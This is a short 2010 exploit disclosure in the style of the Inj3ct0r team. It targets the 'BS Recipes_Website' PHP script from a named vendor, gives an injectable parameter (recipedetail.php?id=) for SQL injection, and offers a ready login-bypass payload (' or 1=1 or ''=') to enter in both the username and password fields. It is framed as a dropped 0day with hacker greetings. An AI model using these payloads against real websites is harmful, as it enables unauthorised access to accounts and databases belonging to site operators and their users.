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0 I'm Sid3^effects member from Inj3ct0r Team 1
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Name :Bs Recipes_Website Script Sqli/Auth bypass Vulnerability
Date : july 5,2010
Critical Level : HIGH
vendor URL :http://www.brotherscripts.com/
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
Description :
BS recipes website allows people to share their favorite recipes with others in the categories that you create. Members can also send an email message of recipes they like to others directly through the website
Xploit :SQli Vulnerability
DEMO URL 1:http://server/Recipes_Website/recipedetail.php?id=[sqli]
Xploit: Auth Bypass
Use' or 1=1 or ''=' in both username and password :D
# 0day no more
# Sid3^effects